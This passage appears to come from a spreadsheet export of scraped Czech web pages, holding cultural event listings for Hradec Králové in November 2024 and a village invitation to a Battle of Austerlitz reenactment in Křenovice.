Jurčeková, Ctibor Košťál , Zdeněk Vojáček, Luděk Vojtěchovský , Roman Vondrouš). Porotkyně Štěpánka Bieleszová , kurátorka sbírky fotografie Muzea umění Olomouc , a Kamila Bendorffová, fotografka, cestovatelka, organizátorka fotofestivalu v Blatné , ocenily širokou škálu stylů, témat a technologických procesů, z nichž každý divákovi nabízí něco jedinečného. Porota letošní 7. ročník Salonu východočeské fotografie chápe jako mimořádnou příležitost povzbudit a objevit regionální tvůrce, kteří, ačkoli nepůsobí v centru dění, jsou schopni velmi originálně vidět svět v novém světle. FOTÍME EVROPU, JIŽ 20 LET! 25.listopadu - pondělí od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 25.listopadu - pondělí od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 25.listopadu - pondělí od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 25.listopadu - pondělí od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 25.listopadu - pondělí od 10:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169, (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 Vojtěch MatochaRežie: Pavel Khek 25.listopadu - pondělí od 11:00 hodin Prašina je tajuplné místo uprostřed Prahy . Nikdo neví proč, ale na Prašině nefunguje elektřina. Lampy tu nesvítí, tramvaje nejezdí, rádio nehraje, mobil je bez signálu. Jako kdyby se tam zastavil čas, ale zdání klame. Trojice nerozlučných kamarádů Jirka, En a Tonda začnou pátrat po tajemstvích z minulosti. Čelit musí řadě nebezpečí, které prověří nejen jejich odvahu, ale také jejich přátelství. A netoužíme všichni po místě, kde není internet, je tam tma a ticho a nejsme neustále online? Není to tak, že ve světě plném pokroku ztrácíme jeden druhého, ale i svoji vlastní duši? Co takhle na chviličku utéct a prožít něco reálného? Prašina se stala bestsellerem a čtenáře si získala jak mezi dětmi, tak mezi dospělými. Klicperovo divadlo uvede titul na divadelních prknech jako první v České republice . Kniha byla v roce 2019 nominována na Cenu Magnesia Litera v kategorii Litera pro děti a mládež. Vojtěch Matocha napsal již dvě pokračování a chystá se i filmové zpracování tohoto fenoménu. Délka představení 2:20 s přestávkou. Doporučeno divákům od 10 let. 160 vstupné 160 Kč | Hlavní scéna - volné sezení | KLICPEROVO DIVADLO o.p.s. Hlavní scéna - volné sezení 2024-11-25 16:00:00 2024-11-25 17:30:00 KERAMIKA HRAVĚ A KREATIVNĚ 25.listopadu - pondělí od 16:00 hodin Keramika pro děti hravě a kreativně – schopnost tvořit máme všichni a právě hlína je úžasným materiálem, který nás vrací hluboko do minulosti, kdy ještě člověk ovládal řemeslo a souzněl s přírodou. Právě teď je ta doba, kdy je třeba dávat důraz na tradici, řemeslo, kreativitu a estetiku a odbíhat od moderních technologií, chytrých telefonů a bloumání po sociálních sítích, zejména v případě mladé generace, která tráví spoustu času ve virtuálním světě. A právě hlína a její hnětení a tvarování a formování nás uvádí do přítomného okamžiku, kdy dochází ke zklidnění a soustředění se na to, co právě vytvářím. Kurz keramiky v Médiu je zaměřený na rozvíjení fantazie, podporu tvořivosti, nápaditosti a výtvarného cítění, seznámí děti s keramickým řemeslem a jeho základy a pravidly. Pod odborným dohledem děti samy mohou vytvářet menší i větší díla, bude jim nabídnuto široké spektrum materiálů a výrobních technik a zároveň se naučí pracovat s glazurami. Radost z výsledků práce bude umocněna, když si své originální výtvory a dílka z keramiky odnesou domů. Práce s keramickou hlínou v dětech podporuje kreativní myšlení a rozvíjí jemnou motoriku a díky svým relaxačním účinkům je vhodná i pro děti s poruchou pozornosti a děti s ADHD. Lektorka: Martina Jiroutová, výtvarnice Kurz je určen pro všechny děti od 7 do 13 let a je i pro děti nepozorné a hyperaktivní Každé pondělí od 16,00 do 17,30 hod. v keramické dílně v Médiu Ladislav Zibura - Pěšky mezi buddhisty a komunisty 25.listopadu - pondělí od 16:30 hodin Excentrický poutník Ladislav Zibura se na jaře 2016 vypravil do Himálaje , zapadlých nepálských vesnic a neprobádaných údolí čínských řek. Příběh jeho 1 500 kilometrů dlouhé pěší výpravy je svědectvím o jednoduchosti života a půvabu svobody, u kterého se budete smát od začátku až do konce. Ať už ho zrovna zatýká policie, trpí vysokohorskou nemocí nebo zachraňuje lidský život, Ladislav vším proplouvá s neobyčejnou lehkostí. Nečekejte žádné popisy památek. Projekce je o Číňanech, Nepálcích a jejich životech. 300 vstupné 300 Kč | Velký sál | Bio Central Velký sál 2024-11-25 17:00:00 2024-11-25 17:00:00 PIRATE SWING BAND GALA 25.listopadu - pondělí od 19:00 hodin 11. ROČNÍK OJEDINĚLÉHO KONCERTNÍHO PROJEKTU PIRATE SWING BANDU JIŘÍHO ŠEVČÍKA NABÍDNE 3 EXKLUZIVNÍ PŘEDSTAVENÍ SPOLEČNÉHO PROGRAMU SE SPECIÁLNÍM HOSTEM JANKEM LEDECKÝM Po superúspěšné desetileté sérii koncertů „PIRATE SWING Band Gala“ chystá hudební senzace oceňovaná doma i v zahraničí svá netradiční galapředstavení i letos. Dvacetičlenný big band, jediná kapela v Evropě , specializující se na vlastní swingové aranže rocku a popu, letos nabídne něco zcela ojedinělého. „Představte si Franka Sinatru zpívat Nirvanu“, prohlásil o tělese kytarista legendárních Queen , Brian May . Právě s touto legendou měli čeští „Piráti“ to potěšení spolupracovat hned třikrát, naposled v roce 2018, kdy se dokonce stali jedinou kapelou v historii krom Queen, na jejíž novém CD oficiálně zpívá Freddie Mercury a na kytaru hraje Brian May , to vše pro charitu proti AIDS. Na svém kontě mají 5 CD a DVD, hitparádové úspěchy v Británii , Francii , Holandsku , Rakousku , Argentině , Rusku , Austrálii , Irsku a Japonsku , 9 vyprodaných turné, mezinárodní ocenění trofejí Platinové desky, status nejpopulárnější swingové kapely u nás a spolupráci s prakticky kompletní českou špičkou (K. Gott., J. Suchý, L. Machálková, J. Laufer, J. Zelenková, T. Graves, O. Ruml, I. Pazderková, P. Vondráček, F. Slováček, E. Kočičková, M. Ruppert, O. Brousek, D. Bárta, V. Dyk , J. Korn, 4TET, B. Josef, I. Mládek, J. Molavcová, L. Sobota…). Band je znám svou nevypočitatelností a v rámci jedenáctého ročníku Galakoncertů jako překvapení svým fanouškům připravil opět něco zcela odlišného, ba možná až šokujícího. V exkluzivně napsané a nazkoušené show se totiž spojí s umělcem z přesně opačného pólu hudebního spektra, Jankem Ledeckým. Nedokážete si písničkáře s kytarou představit s dvacetičlenným bigbandem za zády? Jste zvědavi, jaké překvapivé skladby zahraničních velikánů si od Pirátů nechal pouze pro ten večer swingově zaranžovat? Potom budete zírat! Jeden z největších českých hitmakerů, autor čtyř muzikálů a držitel bezpočtu ocenění se vůbec poprvé představí s baterií žesťů za zády, konkrétně žesťů pirátských. Nenechte si to ujít! Neopakovatelný zážitek vás čeká pouze třikrát, představení se poté již nebude reprízovat. Královéhradecký koncert nabídne i možnost zakoupení VIP vstupenek (sezení přímo u pódia - VIP stůl s možností občerstvení + víno ). Tedy: zapomeňte na všechno, co jste slyšeli o swingu a připravte se na slavnostní večer, kde je vše jinak a který vás osvěží a pobaví. A tomu věřte ;-) Ladislav Zibura – Holidays in EuropeLadislav Zibura – Prázdniny v Evropě 25.listopadu - pondělí od 19:30 hodin Mladý spisovatel a blonďatý rošťák Ladislav Zibura se vrací na pódia s novou projekcí. Tentokrát se vydal do oblasti, která je dostupná a krásná, přesto o ní většina cestovatelů nemluví. Vydal se prostopovat Evropu . Přijďte se zasmát u jeho vyprávění o 14 000 kilometrů dlouhé cestě na sedadle spolujezdce. Ladislav vás ve společnosti svérázných řidičů provede čtrnácti zeměmi – z horkého předměstí Athén přes malebné albánské vesnice až za polární kruh. Odhalí vám přitom místa, na která jste se vždycky chtěli podívat, jen jste o nich dosud neslyšeli. A taky vám se svým nakažlivým optimismem dokáže, že jste se narodili na tom nejrozmanitějším kontinentu světa. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_637_3239872452_5df5c44d802d036b4bdb.html</t>
  </si>
  <si>
    <t>5df5c44d802d036b4bdb</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 03. 11. 2024 2024-11-01 09:00:00 2024-12-31 12:00:00 03.listopadu - neděle od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 03.listopadu - neděle od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala . 03.listopadu - neděle od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. Pohádky v AdaluVhodné pro děti od 4 let. 03.listopadu - neděle od 10:00 hodin Hodné čarodějky ze Zeleného vršíčku nemají klid ani na penzi. A když se k nim donese, že v pekle je kromě čertic a čertíků nějaké samozvané strašidlo, rychle se vydají na cestu, aby tam pomohly strašidlo nalézt. Veselou a vůbec ne strašidelnou činoherní pohádku uvede soubor Studio PH Pohádka. Určeno dětem od čtyř let. * V sále je volný zasedací pořádek. * Vstupenku do sálu musí mít dětský i dospělý divák. Pokud je divákem dítě mladší dvou let, má vstup zdarma, ovšem bez nároku na místo. * Prosíme dospělé diváky, aby při výběru míst brali ohled na ty malé, kterým by případně mohli bránit ve výhledu. Děkujeme za vstřícnost a těšíme se na Vaši návštěvu! PROHLÍDKY MVE HUČÁK NEJEN PRO SENIORY 03.listopadu - neděle od 11:00 hodin Každou první neděli v měsíci vás vezmeme do historie Malé vodní elektrárny Hučák, a to nejen pohledem na doborvé fotografie, ale také do stále plně funkční historické strojovny. Těšíme se na vás tyto neděle: 7. ledna, 4. února, 3. března, 7. dubna, 5. května, 2. června, 7. července, 4. srpna, 1. září, 6. října, 3. listopadu, 1. prosince. Prohlídky se uskuteční vždy v časech od 11:00, 13:00, 15:00 hodin. Na prohlídky není potřeba se registrovat. PROHLÍDKY MVE HUČÁK NEJEN PRO SENIORY 03.listopadu - neděle od 13:00 hodin Každou první neděli v měsíci vás vezmeme do historie Malé vodní elektrárny Hučák, a to nejen pohledem na doborvé fotografie, ale také do stále plně funkční historické strojovny. Těšíme se na vás tyto neděle: 7. ledna, 4. února, 3. března, 7. dubna, 5. května, 2. června, 7. července, 4. srpna, 1. září, 6. října, 3. listopadu, 1. prosince. Prohlídky se uskuteční vždy v časech od 11:00, 13:00, 15:00 hodin. Na prohlídky není potřeba se registrovat. The Wild Robot 03.listopadu - neděle od 13:00 hodin Co se stane robotovi, když se ocitne na opuštěném ostrově? Studio DreamWorks Animation , tvůrci série Jak vycvičit draka, v animovaném dobrodružství Rozzum v divočině tvrdí, že tu může najít srdce. Robotka z výrobní řady typu Rozzum (pro přátele Roz) byla zkonstruována, aby spolehlivě plnila úkoly od svých lidských zadavatelů. Když ovšem vinou nehody ztroskotá na ostrově, kde žádní lidé nejsou, netuší, co si s nabytou svobodou počít. A také se musí naučit, jak se adaptovat na nehostinné podmínky hroudy hlíny uprostřed oceánu obývané jen zvířaty. Roz má naštěstí natolik pokročilý software, že se naučí se zdejšími obyvateli komunikovat a spolupracovat, dokonce se stane adoptivní mámou osiřelého housete. Všechny její zdejší zážitky postupně vedou k tomu, že tam, kde dřív byl jen bezchybný počítačový program, jsou teď myšlenky, názory, nápady a hlavně city, které můžou být občas i nedokonalé. Robotí holka ve světě bez lidí zkrátka zlidštěla. Bohužel ji trochu dělají starosti její výrobci, kterým chybí jeden stroj a usilovně po něm pátrají, a pak taky její adoptivní ptačí synátor. Toho musí připravit na odlet do teplých krajin, než přijde zima. Film Rozzum v divočině je adaptací světového bestselleru spisovatele Petera Browna . Jméno hlavní hrdinky nese českou stopu, když odkazuje ke Karlovi Čapkovi a Rossumovým universálním robotům z jeho divadelní hry R. U. R. Režisér Chris Sanders (tvůrce filmů Jak vycvičit draka a Croodsovi) objevil knižní předlohu díky dceřině domácímu úkolu a okamžitě se do ní zamiloval. „I já mám rád velké dobrodružné příběhy, ale ještě víc mě těší, když v nich můžu pozorovat drobné, až intimní emocionální momenty, které si odnesete kina. Na tyhle scény se rád soustředím i jako tvůrce a tady jsem si to užil vrchovatě,“ říká režisér Sanders. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-03 13:30:00 2024-11-03 14:55:00 BambiBambi, L'histoire d'une vie dans les bois 03.listopadu - neděle od 13:30 hodin Malý kolouch Bambi žije se svou maminkou uprostřed rozlehlých lesů. Jeho dny jsou od narození naplněny nejen skotačením, ale i objevováním a poznáváním tajemství lesa. Matka ho každý den učí nové věci, aby se, až vyroste, stal silným a statečným jelenem. Jeho nejbližšími přáteli se stávají králík Dupík a mýval Kvítek, se kterými se dá i pod dohledem rozvážného havrana zažít spousta legrace. Nejvíc času Bambi rád tráví se svou kamarádkou, mladou laňkou Fili, která nezkazí žádnou zábavu. Na podzim však jejich bezstarostný život změní příchod lovců. Během zoufalého úprku je Bambi oddělen od matky a zůstává sám. Vyděšeného ho najde velký, majestátní jelen, který není nikdo jiný než jeho otec. Bambi se musí postupně naučit, jak se chránit před nebezpečím divočiny a jak dospět… 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-03 14:00:00 2024-11-03 17:00:00 NEDĚLÁNÍ / CESTA DO MEXIKA 03.listopadu - neděle od 14:00 hodin Mexicky barevné odpoledne pro děti, rodiče ale také pro smrtečky a smrťáčky, kteří se s radostí schází, aby si vyprávěli své příběhy. Pro děti od čtyř let. Program připravují lektoři a dobrovolníci Divadla Drak ve spolupráci se ZUŠ Střezina a ZUŠ Třebechovice. 14.00 - 16.00 Hry a dílny v Labyrintu (přijďte kdykoliv budete chtít) 16.00 - PŘÍBĚHY MALÉ LUPITINY G (Loutky bez hranic, hraje Jiřina Vacková) PROHLÍDKY MVE HUČÁK NEJEN PRO SENIORY 03.listopadu - neděle od 15:00 hodin Každou první neděli v měsíci vás vezmeme do historie Malé vodní elektrárny Hučák, a to nejen pohledem na doborvé fotografie, ale také do stále plně funkční historické strojovny. Těšíme se na vás tyto neděle: 7. ledna, 4. února, 3. března, 7. dubna, 5. května, 2. června, 7. července, 4. srpna, 1. září, 6. října, 3. listopadu, 1. prosince. Prohlídky se uskuteční vždy v časech od 11:00, 13:00, 15:00 hodin. Na prohlídky není potřeba se registrovat. Living LargeŽivot k sežrání 03.listopadu - neděle od 15:00 hodin Raz dva, raz dva… zkouška mikrofonu. Dvanáctiletý Ben nadevše miluje nejen muziku, ale i jídlo a vaření. A je to na něm taky znát. Když se ale jednoho dne zabouchne do spolužačky Klárky, rozhodne se s kily navíc zatočit. Na cestě za vysněnou postavou i Klárčiným srdcem mu pomáhají hlavně kamarádi z kapely a starostlivá maminka. Animovaný film režisérky Kristiny Dufkové natočený podle knižního bestselleru Mikaëla Olliviera s humorem za doprovodu nadupaných songů sleduje první strasti, lásky i nástrahy dospívání. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-03 15:30:00 2024-11-03 16:55:00 BambiBambi, L'histoire d'une vie dans les bois 03.listopadu - neděle od 15:30 hodin Malý kolouch Bambi žije se svou maminkou uprostřed rozlehlých lesů. Jeho dny jsou od narození naplněny nejen skotačením, ale i objevováním a poznáváním tajemství lesa. Matka ho každý den učí nové věci, aby se, až vyroste, stal silným a statečným jelenem. Jeho nejbližšími přáteli se stávají králík Dupík a mýval Kvítek, se kterými se dá i pod dohledem rozvážného havrana zažít spousta legrace. Nejvíc času Bambi rád tráví se svou kamarádkou, mladou laňkou Fili, která nezkazí žádnou zábavu. Na podzim však jejich bezstarostný život změní příchod lovců. Během zoufalého úprku je Bambi oddělen od matky a zůstává sám. Vyděšeného ho najde velký, majestátní jelen, který není nikdo jiný než jeho otec. Bambi se musí postupně naučit, jak se chránit před nebezpečím divočiny a jak dospět… 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-03 16:00:00 2024-11-03 17:00:00 03.listopadu - neděle od 16:00 hodin hraje Ivana Bílková Dámy a pánové, lejdýs end džentlmen, madamí, mesijé, siňora si siňores. BLECHA OBECNÁ!!!!!!! Její skutečná velikost je o něco větší, než zrnko prachu a o dost menší, než je zrnko vína . A vy si určitě říkáte, jak tak malé a skoro neviditelné zvíře, může předvádět výjimečné a unikátní kousky? A přesto, právě blecha doskočí mnohem dál, než tygr a svou silou pohne mnohem těžším břemenem, než slon a svou elegancí překoná všechno, co jste dosud viděli. Ano, je to nepatrné zvíře a Váš ctěný zrak ještě asi není zcela připraven zahlédnout ho v celé kráse, ale nebojte se, můj zrak, který vidí všechny tyto dokonalé tvory, Vám jistě zprostředkuje vše potřebné. Ale dost již slov. Prosím přivítejte potleskem prvního účinkujícího… Tento pohádkový kabaret je opět velkou hereckou příležitostí pro Ivanu Bílkovou. Uvidíte na jevišti kouzla, kterým stěží uvěříte. Skákající blechy do bazénu. Blechu, která pohne kostkou několika násobně větší, než je ona sama. Zpívající blechu a další a další kouzla. Sejdeme se v příjemném prostředí kavárny Artičok , kde pro vás bude jako vždy připravená výborná káva i spousta dobrot. Ty si můžete vychutnat i během představení. Vstupenky se prodávají od 15 hod na místě, nebo si je můžete zajistit již nyní v předprodeji (viz „zakoupit vstupenky“ níže). Držitelé Rodinných pasů mají slevu. Děti do 2,99 let mají vstup zdarma. Vstupné platí děti i dospělý doprovod. Celková délka představení je cca 40 minut. Akci podpořilo město Hradec Králové . Pro děti ve věku 3 — 99 let VSTUPNÉ 90 Kč, pro držitele Rodinných pasů 70 Kč Koncertní řada Stříbrná 03.listopadu - neděle od 17:00 hodin Do doby c. a k. Hradce Králové , kdy elegance uniforem hrála prim. Do světa kavárenských (a lázeňských) orchestrů. Za hudbou tolik podezřelou? Každý hovor o kýči utišíme náležitým uměním. Noblesní zážitek bez rizika kompromitace! FHK SALONNÍM ORCHESTREM J. STRAUSS ML., LEHÁR, SCHRAMMEL, O. N. STRAUSS, KREISLER, KÁLMÁN, BENATZKY, ABRAHAM, MACKEBEN, KREUDER Filharmonie Hradec Králové 230 vstupné 230 Kč | Muzeum východních Čech | Filharmonie Hradec Králové Muzeum východních Čech 2024-11-03 17:00:00 2024-11-03 18:30:00 Koncertní řada Stříbrná 03.listopadu - neděle od 17:00 hodin Do doby c. a k. Hradce Králové , kdy elegance uniforem hrála prim. Do světa kavárenských (a lázeňských) orchestrů. Za hudbou tolik podezřelou? Každý hovor o kýči utišíme náležitým uměním. Noblesní zážitek bez rizika kompromitace! FHK SALONNÍM ORCHESTREM J. STRAUSS ML., LEHÁR, SCHRAMMEL, O. N. STRAUSS, KREISLER, KÁLMÁN, BENATZKY, ABRAHAM, MACKEBEN, KREUDER Filharmonie Hradec Králové 260 vstupné 260 Kč | Muzeum východních Čech | Filharmonie Hradec Králové Muzeum východních Čech 2024-11-03 17:00:00 2024-11-03 19:19:00 Anora 03.listopadu - neděle od 17:00 hodin Proč by sexuální pracovnice nemohla toužit po opravdové lásce? Anora (Mikey Madison) je ještě tak naivní, že takový sen má. Když si v klubu její společnost objedná mladý a bohatý Rus Ivan, zajiskří to mezi nimi a po pár týdnech si říkají ano na spontánní svatbě ve Vegas . Je možné, že Anora našla svého prince na bílém koni? Ivanovi rodiče si to nemyslí. Strhující, vtipná a šílená jízda režiséra Seana Bakera (The Florida Project) získala Zlatou palmu v Cannes a první diváci ji označují za minimálně stejně zábavnou podívanou jakou je jiný vítěz stejné ceny, Trojúhelník smutku. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-03 18:00:00 2024-11-03 18:00:00 03.listopadu - neděle od 18:00 hodin Dramatizace části knihy Jiřího Trnky o klucích, kocouru a zahradě v režii Jiřiny Krtičkové. State of EmergencyVýjimečný stav 03.listopadu - neděle od 18:00 hodin Rozhlasový zpravodaj na Blízkém východě Karel Beran přijíždí na základě anonymu na otočku soukromě do Prahy . V Kamburu, který neprofesionálně opustil, však právě ve stejnou chvíli vypuká revoluce. Dostát povinnosti reportéra donutí zkušeného profesionála k mystifikačním reportážím, kdy vřavu arabské revoluce simuluje na kuchyňských spotřebičích ve vinohradském bytě. Rozkročen mezi řešením osobního problému a povinností zpravodajsky informovat posluchače se však chytne do vlastní pasti. Když se na základě vysoce sledovaných příspěvků rozhodně Český rozhlas poslat za zpravodajem podpůrný tým, ocitne se před neřešitelnou volbou: buď se přizná k mediálnímu podvodu, nebo musí předstírat vlastní smrt. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-01 18:00:00 2024-11-03 12:00:00 03.listopadu - neděle od 18:00 hodin Po třinácté, po páté v Bělči , vlna nekompromisní muziky napříč žánry, podzimní pohoda, setkání. KAPELY/DJs/SELECTORs/PROJEKCE/OPEN MIC/SAUNA/OHEŇ/VODA/FASHION BAZAR 03.listopadu - neděle od 18:30 hodin Utkání fotbalové Chance ligy. Conclave 03.listopadu - neděle od 20:00 hodin Kardinál Lawrence je pověřen vedením jedné z nejtajnějších a nejstarších událostí na světě - volbou nového papeže, při níž se ocitá v centru spiknutí, které by mohlo otřást samotnými základy církve. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-03 20:30:00 2024-11-03 21:48:00 War CorrespondentVálečný zpravodaj 03.listopadu - neděle od 20:30 hodin Celovečerní dokument přináší pohled na život a práci jednoho z nejvýznamnějších českých válečných zpravodajů Martina Dorazína . Znepokojující snímek režisérů Davida Čálka , Benjamina Tučka a producenta Václava Flegla vypráví osudy lidí, které válka přímo zasahuje, nabízí pohled na současný konflikt na Ukrajině , upozorňuje na širší kontext války a na význam válečné žurnalistiky. Prostřednictvím reportéra Martina Dorazína , skrz jeho postavu, objevujeme běžný život obyčejných lidí, dlouhodobě vystavených dopadům války. Ukazujeme sílu, která ve skutečnosti rozhoduje války. Není to vítězství na frontě, ale odolnost zázemí – ať už zvítězí jakákoli strana, lidé budou stejně pořád žít tam, kde žili. Téma odolnosti společnosti objevujeme očima válečného zpravodaje, prostřednictvím jeho práce se zvukem v rozhlasových reportážích. Ve filmu odkazujeme i na mimoválečný kontext – společnost je tak silná, jak silný je její nejslabší jedinec. Prohra většinou nenastává tam, kde se lidi semkli, protože samotné semknutí zvyšuje šanci na přežití celku. To je téma, které promlouvá i ke společnosti, válkou přímo neohrožené. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_638_3239859129_1aa82f7e4865a091987b.html</t>
  </si>
  <si>
    <t>1aa82f7e4865a091987b</t>
  </si>
  <si>
    <t>Francouzové v Křenovicích</t>
  </si>
  <si>
    <t>Francouzové v Křenovicích S čím vám můžeme pomoci? Hledaný výraz: webové stránky jsou v rekonstrukci, prosíme o strpení Rychlé odkazy Zajímavé informace rychlé dostupné z našeho obsahu. Kdy: 29. 11. 2024 16:00 – 1. 12. 2024 12:00 Kde: Křenovice a okolí Skupina historického šermu Buhurt a obec Křenovice si vás dovolují pozvat při příležitosti 219. výročí Bitvy tří císařů Typ akce: historické akce (rekonstrukce bitvy), ostatní (akce pro veřejnost) do historického ležení francouzských vojsk ve dvoře Obecní hospody, k malé šarvátce vojenských jednotek na konci ulice Havlíčkové, na pochod k hromadným hrobům na Zlaté hoře zakončený ohňostrojem, k malému pietnímu aktu u božích muk a slavnostnímu nástupu a čestné salvě u pomníku M. I. Kutuzova. V pátek 29. listopadu 2024 Od 10 hodin bude improvizované vojenské ležení přístupné pro děti ze školky a žáky ze školy, kde jim bude podán odborný a poutavý výklad. V 16.00 hodin se ležení otevře pro veřejnost. Jako již tradičně zde uvidíte vojáky a markytánky ve francouzských a rakouských uniformách kolem táborových ohňů. Ve dvoře s dobovými rekvizitami, povozy a kanóny pak spatříte civilisty v historických kostýmech, kováře a vojenského kuchaře při opékání selete. V provozu bude rovněž střežené dobové vězení pro dezertéry, neposlušné vojáky a jinou podobnou chátru. Můžete také nahlédnout do našeho velitelského štábu spojeneckých rusko-rakouských vojsk upraveného z naší klubovny. Rovněž zde uvidíte plně vybavený markytánský vůz, kde se dozvíte, co všechno markytánky pro vojáky zajišťovaly. V letošním roce opět posílí naše řady jednotky z Francie a Rumunska . Pro návštěvníky nebude chybět prodej svařeného vína a párků v rohlíku. V 17.40 hodin se jednotky přemístí na konec ulice Havlíčkové, kde předvedou malou šarvátku. Tradičně se zde utkají vojáci všech zúčastněných armád Bitvy tří císařů, Francouzi proti Rakušanům a Rusům. Ukázka bude s mluveným doprovodem. V 19.00 hodin vyjdou jednotky uniformovaných vojáků, kanón tažený koňmi, děti s lampióny a ostatní směrem ke Zlaté hoře. Zde u hromadných hrobů vojínů slavkovské bitvy uctíme památku padlých, kteří zde již 219 let odpočívají. Při tomto pietním aktu budou položeny květiny a vystřelena čestná salva. Zapálením svíček na hromadných hrobech si symbolicky připomeneme utrpení všech, kteří zde leží. Potom se, jako každoročně, můžete zahřát u velkého ohně svařeným vínem nebo teplým čajem. Po krátkém reprodukovaném projevu bude za doprovodu hudby odpálen slavnostní ohňostroj. V sobotu 30. listopadu 2024 Dopoledne projde průvod francouzských dělostřeleckých a pěších jednotek obcí k božím mukám, k malému pietnímu aktu v 11.00 hodin. V neděli 1. prosince 2024 V 9.00 hodin proběhne v Křenovicích slavnostní nástup vojenských jednotek u sochy M. I. Kutuzova v ulici Na Liškově. Zde zazní čestná salva s krátkým proslovem, a poté se jednotky přemístí na Mohylu míru ke společnému pietnímu aktu, který se uskuteční ve 12.00 hodin. Oldřich Bartošek, za skupinu historického šermu Buhurt Další informace Datum vložení: 29. 9. 2024 15:15 Datum poslední aktualizace: 31. 10. 2024 9:39 Aktuality Autor: Obec Křenovice</t>
  </si>
  <si>
    <t>108</t>
  </si>
  <si>
    <t>20241101_639_3239807411_41e415318e87c67e87ca.html</t>
  </si>
  <si>
    <t>41e415318e87c67e87ca</t>
  </si>
  <si>
    <t>Spisovatelská inspirace</t>
  </si>
  <si>
